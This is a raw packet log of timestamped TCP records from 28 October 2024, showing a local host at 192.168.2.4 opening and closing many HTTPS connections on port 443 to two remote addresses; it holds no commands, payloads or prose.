                                                                                                                                                                            Oct 28, 2024 19:12:52.916837931 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.917159081 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.917162895 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.917579889 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.917876959 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.917890072 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.918262005 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.918267012 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.951523066 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.951845884 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.951869965 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.952212095 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.952224016 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992366076 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992440939 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992481947 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992496967 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.992531061 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.992683887 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.992683887 CET59213443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.992713928 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.992741108 CET4435921313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.995590925 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.995635986 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:52.995699883 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.995853901 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:52.995870113 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052498102 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052609921 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052701950 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.052711964 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052748919 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052803993 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.052845001 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.052856922 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.052865028 CET59211443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.052869081 CET4435921113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.054963112 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.055003881 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.055154085 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.055277109 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.055305004 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.058768034 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.059422970 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.059478045 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.059545040 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.059554100 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.059571028 CET59214443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.059575081 CET4435921413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.061541080 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.061556101 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.061605930 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.061738014 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.061748981 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.062177896 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.062328100 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.062429905 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.062453032 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.062457085 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.062467098 CET59212443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.062469006 CET4435921213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.063805103 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064042091 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.064049959 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064331055 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.064357042 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064399004 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064428091 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.064621925 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.064646959 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064706087 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.064785957 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.064850092 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.072483063 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.072779894 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.072789907 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.073236942 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.073508024 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.073586941 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.073599100 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.094171047 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.094260931 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.094295979 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.094306946 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.094353914 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.094480038 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.094480991 CET59215443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.094513893 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.094532967 CET4435921513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.096539974 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.096551895 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.096612930 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.096736908 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.096749067 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.107326984 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.115329981 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.119369984 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.158107996 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.158313036 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.158324003 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.159490108 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.159836054 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.159934998 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.160011053 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.194840908 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.194892883 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.194937944 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.195096970 CET59216443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.195102930 CET44359216162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.206023932 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.206091881 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.206199884 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.206278086 CET59217443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.206290007 CET44359217162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.213120937 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.296798944 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.296945095 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.297161102 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.297400951 CET59218443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:12:53.297405958 CET44359218162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.783253908 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.784212112 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.784240961 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.784761906 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.784765959 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.810820103 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.811471939 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.811486006 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.811882019 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.811886072 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.831873894 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.832434893 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.832464933 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.832760096 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.832767010 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.835599899 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.836010933 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.836039066 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.836448908 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.836456060 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.846086979 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.846524000 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.846530914 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.850929976 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.850933075 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.925422907 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.925625086 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.925854921 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.926556110 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.926556110 CET59219443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.926598072 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.926623106 CET4435921913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.933309078 CET59224443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.933394909 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.934040070 CET59224443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.944614887 CET59224443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.944652081 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.948477983 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.948546886 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.948957920 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.948957920 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.949054956 CET59221443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.949063063 CET4435922113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.952609062 CET59225443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.952651024 CET4435922513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.952801943 CET59225443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.952872992 CET59225443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.952891111 CET4435922513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.970925093 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.970973015 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.971040964 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.971117973 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.971152067 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.971220016 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.971283913 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.971283913 CET59222443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.971335888 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.971358061 CET4435922213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.973768950 CET59226443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.973820925 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.974548101 CET59226443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.974647045 CET59226443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.974672079 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.976268053 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.976424932 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.976528883 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.976528883 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.976531982 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.976579905 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.976762056 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.976779938 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.976811886 CET59220443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.976816893 CET4435922013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.978580952 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.978600025 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.978687048 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.978904963 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.978925943 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.985107899 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.985127926 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.985266924 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.985292912 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.985518932 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.985572100 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.985572100 CET59223443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.985580921 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.985589027 CET4435922313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.987382889 CET59228443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.987427950 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:53.987585068 CET59228443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.987585068 CET59228443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:53.987629890 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.694633007 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.695166111 CET59224443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.695224047 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.695640087 CET59224443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.695653915 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.718275070 CET4435922513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.718625069 CET59225443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.718643904 CET4435922513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.719110012 CET59225443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.719116926 CET4435922513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.727648020 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.728339911 CET59226443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.728339911 CET59226443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.728355885 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.728373051 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.769625902 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.772572041 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.772584915 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.772994041 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.773000002 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.778997898 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.779349089 CET59228443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.779375076 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.779716015 CET59228443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.779721022 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.829335928 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.829521894 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.829596996 CET59224443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.829629898 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.829655886 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.829711914 CET59224443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.829742908 CET59224443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.829762936 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.829776049 CET59224443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.829782963 CET4435922413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.832520008 CET59229443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.832557917 CET4435922913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.832736969 CET59229443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.832894087 CET59229443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.832906961 CET4435922913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.859150887 CET4435922513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.860337019 CET4435922513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.860449076 CET59225443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.860495090 CET59225443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.860511065 CET4435922513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.860523939 CET59225443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.860532045 CET4435922513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.862725019 CET59230443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.862766027 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.862845898 CET59230443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.863025904 CET59230443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.863040924 CET4435923013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.864159107 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.864227057 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.864284039 CET59226443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.864310026 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.864339113 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.864406109 CET59226443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.864489079 CET59226443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.864505053 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.864521027 CET59226443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.864526987 CET4435922613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.866410017 CET59231443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.866436005 CET4435923113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.866693974 CET59231443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.866836071 CET59231443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.866847038 CET4435923113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.909954071 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.910023928 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.910147905 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.910172939 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.910191059 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.910204887 CET59227443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.910211086 CET4435922713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.912431955 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.912475109 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.912554026 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.912678957 CET59232443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.912695885 CET4435923213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.922516108 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.922563076 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.922606945 CET4435922813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:54.922657013 CET59228443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:54.922692060 CET59228443192.168.2.413.107.253.45
